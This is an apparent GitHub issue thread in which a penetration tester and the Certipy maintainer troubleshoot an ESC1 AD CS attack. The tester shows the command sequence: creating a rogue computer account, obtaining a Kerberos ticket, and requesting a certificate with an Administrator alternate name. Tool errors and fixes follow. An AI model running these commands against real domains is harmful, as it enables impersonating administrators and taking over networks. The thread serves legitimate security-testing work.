Another command syntax question re "ESC1 - SAN impersonation" attack

[7MinSec]

Hi again,

I raised this issue and it was determined the certificate service was not running on my CA.

On a second CA in the same environment, Certipy identified it as being vulnerable to ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used GetTGT from Impacket and issued export KRB5CCNAME=ghost-machine.cache.. I also verified with rpcdump that certsrv.exe is running.

Now I'm trying to run with Certipy is as follows:

certipy 'domain.com/GHOST-MACHINE@ip.address.of.CA -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'

When I do, I basically get the same output as issue 19 with a long traceback that ends in:

impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Again, the difference this time around is I believe the certificate services are running so I'm not sure why my attempts are not successful. Could you please help?

Thanks,
Brian

[ly4k]

Hello Brian

To use Kerberos authentication, you have to specify the FQDN of the CA in the target, and not the IP. You can specify the IP in the -target-ip parameter if DNS is an issue. Also, you don't have to use Kerberos, you can just specify the hash or password. Can you please provide the debug output for more troubleshooting?

Best regards
Oliver

[7MinSec]

Thanks! OK so I changed the request to have the FQDN of the CA as the target. Specifically:

certipy 'FQDN.OF.THE.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'

My debug says:

Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 556, in openFile
    return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1227, in create
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/certipy", line 33, in <module>
    sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 172, in main
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 319, in request
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 232, in run
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 225, in connect
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 803, in connect
    return self._transport.connect()
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/transport.py", line 518, in connect
    self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 560, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Thanks,
Brian

[ly4k]

Hello Brian
It seems really weird. Almost as if the named pipe missing. Can you provide me with the certsrv.exe entry from rpcdump?

[ly4k]

A new version of Certipy has been released. Please try with the new -dynamic-endpoint parameter